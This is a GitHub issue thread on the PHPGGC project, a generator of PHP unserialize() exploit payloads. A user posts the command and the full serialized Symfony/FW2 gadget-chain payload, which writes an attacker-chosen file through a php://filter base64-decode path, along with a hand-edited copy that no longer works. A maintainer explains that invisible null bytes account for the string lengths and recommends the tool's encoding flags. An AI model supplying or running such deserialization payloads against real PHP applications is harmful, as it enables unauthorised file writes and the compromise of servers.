ambionics / phpggc

PHPGGC is a library of PHP unserialize() payloads along with a tool to generate them, from command line or programmatically.
https://ambionics.io/blog
Apache License 2.0

wrong string len in serialized payloads #149

Closed. box4444 closed this 1 year ago

box4444 commented 1 year ago

Hello, I generated a payload with this command: phpggc Symfony/FW2 /tmp/test123.txt /tmp/dsdsdsdsdsds

The output payload is: 'O:55:"Symfony\Bridge\PhpUnit\Legacy\SymfonyTestsListenerTrait":11:{s:62:"Symfony\Bridge\PhpUnit\Legacy\SymfonyTestsListenerTraitstate";i:1;s:68:"Symfony\Bridge\PhpUnit\Legacy\SymfonyTestsListenerTraitskippedFile";s:60:"php://filter/convert.base64-decode/resource=/tmp/test123.txt";s:67:"Symfony\Bridge\PhpUnit\Legacy\SymfonyTestsListenerTraitwasSkipped";a:0:{}s:66:"Symfony\Bridge\PhpUnit\Legacy\SymfonyTestsListenerTraitisSkipped";s:79:"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaYWRhZGFkZGRkZGRkZGQK";s:77:"Symfony\Bridge\PhpUnit\Legacy\SymfonyTestsListenerTraitexpectedDeprecations";a:0:{}s:77:"Symfony\Bridge\PhpUnit\Legacy\SymfonyTestsListenerTraitgatheredDeprecations";a:0:{}s:77:"Symfony\Bridge\PhpUnit\Legacy\SymfonyTestsListenerTraitpreviousErrorHandler";N;s:74:"Symfony\Bridge\PhpUnit\Legacy\SymfonyTestsListenerTraittestsWithWarnings";N;s:75:"Symfony\Bridge\PhpUnit\Legacy\SymfonyTestsListenerTraitreportUselessTests";N;s:62:"Symfony\Bridge\PhpUnit\Legacy\SymfonyTestsListenerTraiterror";N;s:78:"Symfony\Bridge\PhpUnit\Legacy\SymfonyTestsListenerTraitrunsInSeparateProcess";b:0;}'

But the string lengths are wrong. After manually correcting the strings:

'O:55:"Symfony\Bridge\PhpUnit\Legacy\SymfonyTestsListenerTrait":11:{s:60:"Symfony\Bridge\PhpUnit\Legacy\SymfonyTestsListenerTraitstate";i:1;s:66:"Symfony\Bridge\PhpUnit\Legacy\SymfonyTestsListenerTraitskippedFile";s:60:"php://filter/convert.base64-decode/resource=/tmp/test123.txt";s:65:"Symfony\Bridge\PhpUnit\Legacy\SymfonyTestsListenerTraitwasSkipped";a:0:{}s:64:"Symfony\Bridge\PhpUnit\Legacy\SymfonyTestsListenerTraitisSkipped";s:79:"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaYWRhZGFkZGRkZGRkZGQK";s:75:"Symfony\Bridge\PhpUnit\Legacy\SymfonyTestsListenerTraitexpectedDeprecations";a:0:{}s:75:"Symfony\Bridge\PhpUnit\Legacy\SymfonyTestsListenerTraitgatheredDeprecations";a:0:{}s:75:"Symfony\Bridge\PhpUnit\Legacy\SymfonyTestsListenerTraitpreviousErrorHandler";N;s:72:"Symfony\Bridge\PhpUnit\Legacy\SymfonyTestsListenerTraittestsWithWarnings";N;s:73:"Symfony\Bridge\PhpUnit\Legacy\SymfonyTestsListenerTraitreportUselessTests";N;s:60:"Symfony\Bridge\PhpUnit\Legacy\SymfonyTestsListenerTraiterror";N;s:76:"Symfony\Bridge\PhpUnit\Legacy\SymfonyTestsListenerTraitrunsInSeparateProcess";b:0;}'

After running the payload I am receiving this error:

Object of class __PHP_Incomplete_Class could not be converted to string

nikaiw commented 1 year ago

Hello. Your attempt at "fixing strings" actually broke properties of the object, preventing its deserialization by PHP. Those strings contain null bytes, which is why they appear shorter to you, yet they have in fact the right length in the payload.

As stated in the previous issue #148, payloads usually contain null bytes invisible to the naked eye. "Generally, you can't just copy paste your payload from the console. Either pipe it to base64, or (preferably) use the -b flag of phpggc to tell it to base64 encode it. You can also use -s to soft urlencode for instance, or use the ASCII armor, or chain encoders."

I would add that unless you are trying to exploit a specific memory corruption bug in unserialize and/or know what you are doing, it is not generally advisable to manually edit a serialized payload.